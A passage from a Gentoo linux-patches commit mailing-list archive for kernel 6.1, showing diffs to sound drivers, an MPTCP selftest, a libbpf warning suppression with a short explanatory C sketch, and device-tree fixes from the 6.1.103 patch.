+-static void cx_jack_unsol_event(struct hda_codec *codec, unsigned int res)
+-{
+-	struct conexant_spec *spec = codec->spec;
+-
+-	if (spec->is_cx8070_sn6140)
+-		cx_update_headset_mic_vref(codec, res);
+-
+-	snd_hda_jack_unsol_event(codec, res);
++	mic_present = snd_hda_codec_read(codec, 0x19, 0, AC_VERB_GET_PIN_SENSE, 0x0);
++	if (!(mic_present & AC_PINSENSE_PRESENCE)) /* mic plugout */
++		snd_hda_codec_write(codec, 0x19, 0, AC_VERB_SET_PIN_WIDGET_CONTROL, 0x20);
++	else
++		cx_process_headset_plugin(codec);
+ }
+ 
+ #ifdef CONFIG_PM
+@@ -307,7 +271,7 @@ static const struct hda_codec_ops cx_auto_patch_ops = {
+ 	.build_pcms = snd_hda_gen_build_pcms,
+ 	.init = cx_auto_init,
+ 	.free = cx_auto_free,
+-	.unsol_event = cx_jack_unsol_event,
++	.unsol_event = snd_hda_jack_unsol_event,
+ #ifdef CONFIG_PM
+ 	.suspend = cx_auto_suspend,
+ 	.check_power_status = snd_hda_gen_check_power_status,
+@@ -1167,7 +1131,7 @@ static int patch_conexant_auto(struct hda_codec *codec)
+ 	case 0x14f11f86:
+ 	case 0x14f11f87:
+ 		spec->is_cx8070_sn6140 = true;
+-		spec->headset_present_flag = CX_HEADSET_NOPRESENT;
++		snd_hda_jack_detect_enable_callback(codec, 0x19, cx_update_headset_mic_vref);
+ 		break;
+ 	}
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index e0df44bfda4e6..edfcd38175d23 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9496,6 +9496,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1025, 0x079b, "Acer Aspire V5-573G", ALC282_FIXUP_ASPIRE_V5_PINS),
+ 	SND_PCI_QUIRK(0x1025, 0x080d, "Acer Aspire V5-122P", ALC269_FIXUP_ASPIRE_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1025, 0x0840, "Acer Aspire E1", ALC269VB_FIXUP_ASPIRE_E1_COEF),
++	SND_PCI_QUIRK(0x1025, 0x100c, "Acer Aspire E5-574G", ALC255_FIXUP_ACER_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x1025, 0x101c, "Acer Veriton N2510G", ALC269_FIXUP_LIFEBOOK),
+ 	SND_PCI_QUIRK(0x1025, 0x102b, "Acer Aspire C24-860", ALC286_FIXUP_ACER_AIO_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1025, 0x1065, "Acer Aspire C20-820", ALC269VC_FIXUP_ACER_HEADSET_MIC),
+diff --git a/sound/usb/stream.c b/sound/usb/stream.c
+index d5409f3879455..e14c725acebf2 100644
+--- a/sound/usb/stream.c
++++ b/sound/usb/stream.c
+@@ -244,8 +244,8 @@ static struct snd_pcm_chmap_elem *convert_chmap(int channels, unsigned int bits,
+ 		SNDRV_CHMAP_FR,		/* right front */
+ 		SNDRV_CHMAP_FC,		/* center front */
+ 		SNDRV_CHMAP_LFE,	/* LFE */
+-		SNDRV_CHMAP_SL,		/* left surround */
+-		SNDRV_CHMAP_SR,		/* right surround */
++		SNDRV_CHMAP_RL,		/* left surround */
++		SNDRV_CHMAP_RR,		/* right surround */
+ 		SNDRV_CHMAP_FLC,	/* left of center */
+ 		SNDRV_CHMAP_FRC,	/* right of center */
+ 		SNDRV_CHMAP_RC,		/* surround */
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.c b/tools/testing/selftests/net/mptcp/mptcp_connect.c
+index e6b514cb7bdda..b6b9f41dbc295 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.c
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.c
+@@ -1040,11 +1040,11 @@ int main_loop_s(int listensock)
+ 		return 1;
+ 	}
+ 
+-	if (--cfg_repeat > 0) {
+-		if (cfg_input)
+-			close(fd);
++	if (cfg_input)
++		close(fd);
++
++	if (--cfg_repeat > 0)
+ 		goto again;
+-	}
+ 
+ 	return 0;
+ }


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-10 15:45 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-10 15:45 UTC (permalink / raw
  To: gentoo-commits

commit:     a54b3d0973c90157cfcd0a9a1ca11d2907b6118c
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Aug 10 15:45:07 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Aug 10 15:45:07 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=a54b3d09

libbpf: workaround -Wmaybe-uninitialized false positive

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ++
 ...workaround-Wmaybe-uninitialized-false-pos.patch | 67 ++++++++++++++++++++++
 2 files changed, 71 insertions(+)

diff --git a/0000_README b/0000_README
index dae675f2..97b15896 100644
--- a/0000_README
+++ b/0000_README
@@ -495,6 +495,10 @@ Patch:  2960_jump-label-fix.patch
 From:   https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/
 Desc:   jump_label: Fix a regression
 
+Patch:  2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch
+From:   https://lore.kernel.org/bpf/3ebbe7a4e93a5ddc3a26e2e11d329801d7c8de6b.1723217044.git.sam@gentoo.org/
+Desc:   libbpf: workaround -Wmaybe-uninitialized false positive
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch b/2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch
new file mode 100644
index 00000000..86de18d7
--- /dev/null
+++ b/2990_libbpf-workaround-Wmaybe-uninitialized-false-pos.patch
@@ -0,0 +1,67 @@
+From git@z Thu Jan  1 00:00:00 1970
+Subject: [PATCH] libbpf: workaround -Wmaybe-uninitialized false positive
+From: Sam James <sam@gentoo.org>
+Date: Fri, 09 Aug 2024 16:24:04 +0100
+Message-Id: <3ebbe7a4e93a5ddc3a26e2e11d329801d7c8de6b.1723217044.git.sam@gentoo.org>
+MIME-Version: 1.0
+Content-Type: text/plain; charset="utf-8"
+Content-Transfer-Encoding: 8bit
+
+In `elf_close`, we get this with GCC 15 -O3 (at least):
+```
+In function ‘elf_close’,
+    inlined from ‘elf_close’ at elf.c:53:6,
+    inlined from ‘elf_find_func_offset_from_file’ at elf.c:384:2:
+elf.c:57:9: warning: ‘elf_fd.elf’ may be used uninitialized [-Wmaybe-uninitialized]
+   57 |         elf_end(elf_fd->elf);
+      |         ^~~~~~~~~~~~~~~~~~~~
+elf.c: In function ‘elf_find_func_offset_from_file’:
+elf.c:377:23: note: ‘elf_fd.elf’ was declared here
+  377 |         struct elf_fd elf_fd;
+      |                       ^~~~~~
+In function ‘elf_close’,
+    inlined from ‘elf_close’ at elf.c:53:6,
+    inlined from ‘elf_find_func_offset_from_file’ at elf.c:384:2:
+elf.c:58:9: warning: ‘elf_fd.fd’ may be used uninitialized [-Wmaybe-uninitialized]
+   58 |         close(elf_fd->fd);
+      |         ^~~~~~~~~~~~~~~~~
+elf.c: In function ‘elf_find_func_offset_from_file’:
+elf.c:377:23: note: ‘elf_fd.fd’ was declared here
+  377 |         struct elf_fd elf_fd;
+      |                       ^~~~~~
+```
+
+In reality, our use is fine, it's just that GCC doesn't model errno
+here (see linked GCC bug). Suppress -Wmaybe-uninitialized accordingly.
+
+Link: https://gcc.gnu.org/PR114952
+Signed-off-by: Sam James <sam@gentoo.org>
+---
+ tools/lib/bpf/elf.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/tools/lib/bpf/elf.c b/tools/lib/bpf/elf.c
+index c92e02394159e..ee226bb8e1af0 100644
+--- a/tools/lib/bpf/elf.c
++++ b/tools/lib/bpf/elf.c
+@@ -369,6 +369,9 @@ long elf_find_func_offset(Elf *elf, const char *binary_path, const char *name)
+ 	return ret;
+ }
+ 
++#pragma GCC diagnostic push
++/* https://gcc.gnu.org/PR114952 */
++#pragma GCC diagnostic ignored "-Wmaybe-uninitialized"
+ /* Find offset of function name in ELF object specified by path. "name" matches
+  * symbol name or name@@LIB for library functions.
+  */
+@@ -384,6 +387,7 @@ long elf_find_func_offset_from_file(const char *binary_path, const char *name)
+ 	elf_close(&elf_fd);
+ 	return ret;
+ }
++#pragma GCC diagnostic pop
+ 
+ struct symbol {
+ 	const char *name;
+-- 
+2.45.2
+
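
The patch scopes the suppression with a push/ignored/pop pair so only the one function that trips the false positive is exempted and -Wmaybe-uninitialized still fires everywhere else. A self-contained sketch of the same scoping around a stand-in function GCC may struggle to prove initialized:

#include <stdio.h>

/* Sketch only: read_maybe() is a stand-in, loosely like the
 * errno-guarded path in elf.c that GCC cannot model. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wmaybe-uninitialized"
static int read_maybe(int ok)
{
        int v;                  /* may trip -Wmaybe-uninitialized at -O3 */

        if (ok)
                v = 42;
        return ok ? v : -1;     /* provably fine, but hard to model */
}
#pragma GCC diagnostic pop      /* warnings fire normally from here on */

int main(void)
{
        printf("%d\n", read_maybe(1));
        return 0;
}
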


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-08-03 15:28 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-08-03 15:28 UTC (permalink / raw
  To: gentoo-commits

commit:     e0009dd3c55f5137532a180281cf4c0ee2d11bf6
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Aug  3 15:27:37 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Aug  3 15:27:37 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e0009dd3

Linux patch 6.1.103 and an additional patch

Add jump label fix patch, thanks to Holger Hoffstätte

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README               |     8 +
 1102_linux-6.1.103.patch  | 16486 ++++++++++++++++++++++++++++++++++++++++++++
 2960_jump-label-fix.patch |    57 +
 3 files changed, 16551 insertions(+)

diff --git a/0000_README b/0000_README
index 2afa5cc7..dae675f2 100644
--- a/0000_README
+++ b/0000_README
@@ -451,6 +451,10 @@ Patch:  1101_linux-6.1.102.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.102
 
+Patch:  1102_linux-6.1.103.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.103
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.
@@ -487,6 +491,10 @@ Patch:  2950_kbuild-CRC32-1MB-dict-xz-modules.patch
 From:   https://git.kernel.org/pub/scm/linux/kernel/git/masahiroy/linux-kbuild.git/commit/?h=kbuild&id=fbf5892df21a8ccfcb2fda0fd65bc3169c89ed28
 Desc:   kbuild: Use CRC32 and a 1MiB dictionary for XZ compressed modules
 
+Patch:  2960_jump-label-fix.patch
+From:   https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/
+Desc:   jump_label: Fix a regression
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/1102_linux-6.1.103.patch b/1102_linux-6.1.103.patch
new file mode 100644
index 00000000..22474658
--- /dev/null
+++ b/1102_linux-6.1.103.patch
@@ -0,0 +1,16486 @@
+diff --git a/Documentation/devicetree/bindings/thermal/thermal-zones.yaml b/Documentation/devicetree/bindings/thermal/thermal-zones.yaml
+index 8d2c6d74b605a..bc9ccdfd3a275 100644
+--- a/Documentation/devicetree/bindings/thermal/thermal-zones.yaml
++++ b/Documentation/devicetree/bindings/thermal/thermal-zones.yaml
+@@ -49,7 +49,10 @@ properties:
+       to take when the temperature crosses those thresholds.
+ 
+ patternProperties:
+-  "^[a-zA-Z][a-zA-Z0-9\\-]{1,12}-thermal$":
++  # Node name is limited in size due to Linux kernel requirements - 19
++  # characters in total (see THERMAL_NAME_LENGTH, including terminating NUL
++  # byte):
++  "^[a-zA-Z][a-zA-Z0-9\\-]{1,10}-thermal$":
+     type: object
+     description:
+       Each thermal zone node contains information about how frequently it
+diff --git a/Makefile b/Makefile
+index 00ec5357bc78d..97149e46565ae 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 102
++SUBLEVEL = 103
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/imx6q-kontron-samx6i.dtsi b/arch/arm/boot/dts/imx6q-kontron-samx6i.dtsi
+index 4d6a0c3e8455f..ff062f4fd726e 100644
+--- a/arch/arm/boot/dts/imx6q-kontron-samx6i.dtsi
++++ b/arch/arm/boot/dts/imx6q-kontron-samx6i.dtsi
+@@ -5,31 +5,8 @@
+ 
+ #include "imx6q.dtsi"
+ #include "imx6qdl-kontron-samx6i.dtsi"
+-#include <dt-bindings/gpio/gpio.h>
+ 
+ / {
+ 	model = "Kontron SMARC sAMX6i Quad/Dual";
+ 	compatible = "kontron,imx6q-samx6i", "fsl,imx6q";
+ };
+-
+-/* Quad/Dual SoMs have 3 chip-select signals */
+-&ecspi4 {
+-	cs-gpios = <&gpio3 24 GPIO_ACTIVE_LOW>,
+-		   <&gpio3 29 GPIO_ACTIVE_LOW>,
+-		   <&gpio3 25 GPIO_ACTIVE_LOW>;
+-};
+-
+-&pinctrl_ecspi4 {
+-	fsl,pins = <
+-		MX6QDL_PAD_EIM_D21__ECSPI4_SCLK 0x100b1
+-		MX6QDL_PAD_EIM_D28__ECSPI4_MOSI 0x100b1
+-		MX6QDL_PAD_EIM_D22__ECSPI4_MISO 0x100b1
+-
+-		/* SPI4_IMX_CS2# - connected to internal flash */
+-		MX6QDL_PAD_EIM_D24__GPIO3_IO24 0x1b0b0
+-		/* SPI4_IMX_CS0# - connected to SMARC SPI0_CS0# */
+-		MX6QDL_PAD_EIM_D29__GPIO3_IO29 0x1b0b0
+-		/* SPI4_CS3# - connected to  SMARC SPI0_CS1# */
+-		MX6QDL_PAD_EIM_D25__GPIO3_IO25 0x1b0b0
+-	>;
+-};
+diff --git a/arch/arm/boot/dts/imx6qdl-kontron-samx6i.dtsi b/arch/arm/boot/dts/imx6qdl-kontron-samx6i.dtsi
+index 85aeebc9485dd..668d33d1ff0c1 100644
+--- a/arch/arm/boot/dts/imx6qdl-kontron-samx6i.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-kontron-samx6i.dtsi
+@@ -244,7 +244,8 @@ &ecspi4 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_ecspi4>;
+ 	cs-gpios = <&gpio3 24 GPIO_ACTIVE_LOW>,
+-		   <&gpio3 29 GPIO_ACTIVE_LOW>;
++		   <&gpio3 29 GPIO_ACTIVE_LOW>,
++		   <&gpio3 25 GPIO_ACTIVE_LOW>;
+ 	status = "okay";
+ 
+ 	/* default boot source: workaround #1 for errata ERR006282 */
+@@ -259,7 +260,7 @@ smarc_flash: flash@0 {
+ &fec {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_enet>;
+-	phy-mode = "rgmii";
++	phy-connection-type = "rgmii-id";
+ 	phy-handle = <&ethphy>;
+ 
+ 	mdio {
+@@ -269,7 +270,7 @@ mdio {
+ 		ethphy: ethernet-phy@1 {
+ 			compatible = "ethernet-phy-ieee802.3-c22";
+ 			reg = <1>;
+-			reset-gpios = <&gpio1 25 GPIO_ACTIVE_LOW>;
++			reset-gpios = <&gpio2 1 GPIO_ACTIVE_LOW>;
+ 			reset-assert-us = <1000>;
+ 		};
+ 	};
+@@ -464,6 +465,8 @@ MX6QDL_PAD_EIM_D22__ECSPI4_MISO 0x100b1
+ 			MX6QDL_PAD_EIM_D24__GPIO3_IO24 0x1b0b0
+ 			/* SPI_IMX_CS0# - connected to SMARC SPI0_CS0# */
+ 			MX6QDL_PAD_EIM_D29__GPIO3_IO29 0x1b0b0
++			/* SPI4_CS3# - connected to SMARC SPI0_CS1# */
++			MX6QDL_PAD_EIM_D25__GPIO3_IO25 0x1b0b0
+ 		>;
+ 	};
+ 
+@@ -516,7 +519,7 @@ MX6QDL_PAD_RGMII_RX_CTL__RGMII_RX_CTL 0x1b0b0
+ 			MX6QDL_PAD_ENET_MDIO__ENET_MDIO       0x1b0b0
+ 			MX6QDL_PAD_ENET_MDC__ENET_MDC         0x1b0b0
+ 			MX6QDL_PAD_ENET_REF_CLK__ENET_TX_CLK  0x1b0b0
+-			MX6QDL_PAD_ENET_CRS_DV__GPIO1_IO25    0x1b0b0 /* RST_GBE0_PHY# */
++			MX6QDL_PAD_NANDF_D1__GPIO2_IO01       0x1b0b0 /* RST_GBE0_PHY# */
+ 		>;
+ 	};
+ 
+@@ -729,7 +732,7 @@ &pcie {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_pcie>;
+ 	wake-up-gpio = <&gpio6 18 GPIO_ACTIVE_HIGH>;
+-	reset-gpio = <&gpio3 13 GPIO_ACTIVE_HIGH>;
++	reset-gpio = <&gpio3 13 GPIO_ACTIVE_LOW>;
+ };
+ 
+ /* LCD_BKLT_PWM */
+@@ -817,5 +820,6 @@ &wdog1 {
+ 	/* CPLD is feeded by watchdog (hardwired) */
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_wdog1>;
++	fsl,ext-reset-output;
+ 	status = "okay";
+ };
+diff --git a/arch/arm/mach-pxa/spitz.c b/arch/arm/mach-pxa/spitz.c
+index 937f56bbaf6c6..effd28294da07 100644
+--- a/arch/arm/mach-pxa/spitz.c
++++ b/arch/arm/mach-pxa/spitz.c
+@@ -512,10 +512,8 @@ static struct ads7846_platform_data spitz_ads7846_info = {
+ static struct gpiod_lookup_table spitz_lcdcon_gpio_table = {
+ 	.dev_id = "spi2.1",
+ 	.table = {
+-		GPIO_LOOKUP("gpio-pxa", SPITZ_GPIO_BACKLIGHT_CONT,
+-			    "BL_CONT", GPIO_ACTIVE_LOW),
+-		GPIO_LOOKUP("gpio-pxa", SPITZ_GPIO_BACKLIGHT_ON,
+-			    "BL_ON", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("sharp-scoop.1", 6, "BL_CONT", GPIO_ACTIVE_LOW),
++		GPIO_LOOKUP("sharp-scoop.1", 7, "BL_ON", GPIO_ACTIVE_HIGH),
+ 		{ },
+ 	},
+ };
+@@ -523,10 +521,8 @@ static struct gpiod_lookup_table spitz_lcdcon_gpio_table = {
+ static struct gpiod_lookup_table akita_lcdcon_gpio_table = {
+ 	.dev_id = "spi2.1",
+ 	.table = {
+-		GPIO_LOOKUP("gpio-pxa", AKITA_GPIO_BACKLIGHT_CONT,
+-			    "BL_CONT", GPIO_ACTIVE_LOW),
+-		GPIO_LOOKUP("gpio-pxa", AKITA_GPIO_BACKLIGHT_ON,
+-			    "BL_ON", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("i2c-max7310", 3, "BL_ON", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("i2c-max7310", 4, "BL_CONT", GPIO_ACTIVE_LOW),
+ 		{ },
+ 	},
+ };
+@@ -953,12 +949,9 @@ static inline void spitz_i2c_init(void) {}
+ static struct gpiod_lookup_table spitz_audio_gpio_table = {
+ 	.dev_id = "spitz-audio",
+ 	.table = {
+-		GPIO_LOOKUP("sharp-scoop.0", SPITZ_GPIO_MUTE_L - SPITZ_SCP_GPIO_BASE,
+-			    "mute-l", GPIO_ACTIVE_HIGH),
+-		GPIO_LOOKUP("sharp-scoop.0", SPITZ_GPIO_MUTE_R - SPITZ_SCP_GPIO_BASE,
+-			    "mute-r", GPIO_ACTIVE_HIGH),
+-		GPIO_LOOKUP("sharp-scoop.1", SPITZ_GPIO_MIC_BIAS - SPITZ_SCP2_GPIO_BASE,
+-			    "mic", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("sharp-scoop.0", 3, "mute-l", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("sharp-scoop.0", 4, "mute-r", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("sharp-scoop.1", 8, "mic", GPIO_ACTIVE_HIGH),
+ 		{ },
+ 	},
+ };
+@@ -966,12 +959,9 @@ static struct gpiod_lookup_table spitz_audio_gpio_table = {
+ static struct gpiod_lookup_table akita_audio_gpio_table = {
+ 	.dev_id = "spitz-audio",
+ 	.table = {
+-		GPIO_LOOKUP("sharp-scoop.0", SPITZ_GPIO_MUTE_L - SPITZ_SCP_GPIO_BASE,
+-			    "mute-l", GPIO_ACTIVE_HIGH),
+-		GPIO_LOOKUP("sharp-scoop.0", SPITZ_GPIO_MUTE_R - SPITZ_SCP_GPIO_BASE,
+-			    "mute-r", GPIO_ACTIVE_HIGH),
+-		GPIO_LOOKUP("i2c-max7310", AKITA_GPIO_MIC_BIAS - AKITA_IOEXP_GPIO_BASE,
+-			    "mic", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("sharp-scoop.0", 3, "mute-l", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("sharp-scoop.0", 4, "mute-r", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("i2c-max7310", 2, "mic", GPIO_ACTIVE_HIGH),
+ 		{ },
+ 	},
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxbb.dtsi b/arch/arm64/boot/dts/amlogic/meson-gxbb.dtsi
+index 7c029f552a23b..256c46771db78 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxbb.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gxbb.dtsi
+@@ -311,8 +311,8 @@ &hdmi_tx {
+ 		 <&reset RESET_HDMI_SYSTEM_RESET>,
+ 		 <&reset RESET_HDMI_TX>;
+ 	reset-names = "hdmitx_apb", "hdmitx", "hdmitx_phy";
+-	clocks = <&clkc CLKID_HDMI_PCLK>,
+-		 <&clkc CLKID_CLK81>,
++	clocks = <&clkc CLKID_HDMI>,
++		 <&clkc CLKID_HDMI_PCLK>,
+ 		 <&clkc CLKID_GCLK_VENCI_INT0>;
+ 	clock-names = "isfr", "iahb", "venci";
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi b/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
+index 3500229350522..a689bd14ece99 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
+@@ -323,8 +323,8 @@ &hdmi_tx {
+ 		 <&reset RESET_HDMI_SYSTEM_RESET>,
+ 		 <&reset RESET_HDMI_TX>;
+ 	reset-names = "hdmitx_apb", "hdmitx", "hdmitx_phy";
+-	clocks = <&clkc CLKID_HDMI_PCLK>,
+-		 <&clkc CLKID_CLK81>,
++	clocks = <&clkc CLKID_HDMI>,
++		 <&clkc CLKID_HDMI_PCLK>,
+ 		 <&clkc CLKID_GCLK_VENCI_INT0>;
+ 	clock-names = "isfr", "iahb", "venci";
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-sm1.dtsi b/arch/arm64/boot/dts/amlogic/meson-sm1.dtsi
+index 80737731af3fe..8bc4ef9d8a61a 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-sm1.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-sm1.dtsi
+@@ -337,7 +337,7 @@ tdmin_lb: audio-controller@3c0 {
+ 		};
+ 
+ 		spdifin: audio-controller@400 {
+-			compatible = "amlogic,g12a-spdifin",
++			compatible = "amlogic,sm1-spdifin",
+ 				     "amlogic,axg-spdifin";
+ 			reg = <0x0 0x400 0x0 0x30>;
+ 			#sound-dai-cells = <0>;
+@@ -351,7 +351,7 @@ spdifin: audio-controller@400 {
+ 		};
+ 
+ 		spdifout_a: audio-controller@480 {
+-			compatible = "amlogic,g12a-spdifout",
++			compatible = "amlogic,sm1-spdifout",
+ 				     "amlogic,axg-spdifout";
+ 			reg = <0x0 0x480 0x0 0x50>;
+ 			#sound-dai-cells = <0>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts b/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
+index b1ddc491d2936..9c9431455f854 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
++++ b/arch/arm64/boot/dts/mediatek/mt7622-bananapi-bpi-r64.dts
+@@ -286,8 +286,8 @@ asm_sel {
+ 	/* eMMC is shared pin with parallel NAND */
+ 	emmc_pins_default: emmc-pins-default {
+ 		mux {
+-			function = "emmc", "emmc_rst";
+-			groups = "emmc";
++			function = "emmc";
++			groups = "emmc", "emmc_rst";
+ 		};
+ 
+ 		/* "NDL0","NDL1","NDL2","NDL3","NDL4","NDL5","NDL6","NDL7",
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts b/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
+index 527dcb279ba52..f4bb9c6521c65 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
++++ b/arch/arm64/boot/dts/mediatek/mt7622-rfb1.dts
+@@ -244,8 +244,8 @@ &pio {
+ 	/* eMMC is shared pin with parallel NAND */
+ 	emmc_pins_default: emmc-pins-default {
+ 		mux {
+-			function = "emmc", "emmc_rst";
+-			groups = "emmc";
++			function = "emmc";
++			groups = "emmc", "emmc_rst";
+ 		};
+ 
+ 		/* "NDL0","NDL1","NDL2","NDL3","NDL4","NDL5","NDL6","NDL7",
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
+index 3d95625f1b0b4..d7fc924a9d0e3 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui-jacuzzi.dtsi
+@@ -168,21 +168,24 @@ anx_bridge: anx7625@58 {
+ 		vdd18-supply = <&pp1800_mipibrdg>;
+ 		vdd33-supply = <&vddio_mipibrdg>;
+ 
+-		#address-cells = <1>;
+-		#size-cells = <0>;
+-		port@0 {
+-			reg = <0>;
++		ports {
++			#address-cells = <1>;
++			#size-cells = <0>;
+ 
+-			anx7625_in: endpoint {
+-				remote-endpoint = <&dsi_out>;
++			port@0 {
++				reg = <0>;
++
++				anx7625_in: endpoint {
++					remote-endpoint = <&dsi_out>;
++				};
+ 			};
+-		};
+ 
+-		port@1 {
+-			reg = <1>;
++			port@1 {
++				reg = <1>;
+ 
+-			anx7625_out: endpoint {
+-				remote-endpoint = <&panel_in>;
++				anx7625_out: endpoint {
++					remote-endpoint = <&panel_in>;
++				};
+ 			};
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+index 1db97d94658b9..03ccdbb1c5edd 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+@@ -767,7 +767,6 @@ pins-tx {
+ 		};
+ 		pins-rts {
+ 			pinmux = <PINMUX_GPIO47__FUNC_URTS1>;
+-			output-enable;
+ 		};
+ 		pins-cts {
+ 			pinmux = <PINMUX_GPIO46__FUNC_UCTS1>;
+@@ -786,7 +785,6 @@ pins-tx {
+ 		};
+ 		pins-rts {
+ 			pinmux = <PINMUX_GPIO47__FUNC_URTS1>;
+-			output-enable;
+ 		};
+ 		pins-cts {
+ 			pinmux = <PINMUX_GPIO46__FUNC_UCTS1>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8996-xiaomi-common.dtsi b/arch/arm64/boot/dts/qcom/msm8996-xiaomi-common.dtsi
+index 77819186086ac..de320bebe4124 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996-xiaomi-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996-xiaomi-common.dtsi
+@@ -368,7 +368,6 @@ &usb3_dwc3 {
+ 
+ &hsusb_phy1 {
+ 	status = "okay";
+-	extcon = <&typec>;
+ 
+ 	vdda-pll-supply = <&vreg_l12a_1p8>;
+ 	vdda-phy-dpdm-supply = <&vreg_l24a_3p075>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 986a5b5c05e48..3b9a4bf897014 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -2016,7 +2016,7 @@ ufshc: ufshc@624000 {
+ 				<&gcc GCC_UFS_RX_SYMBOL_0_CLK>;
+ 			freq-table-hz =
+ 				<100000000 200000000>,
+-				<0 0>,
++				<100000000 200000000>,
+ 				<0 0>,
+ 				<0 0>,
+ 				<0 0>,
+diff --git a/arch/arm64/boot/dts/qcom/msm8998.dtsi b/arch/arm64/boot/dts/qcom/msm8998.dtsi
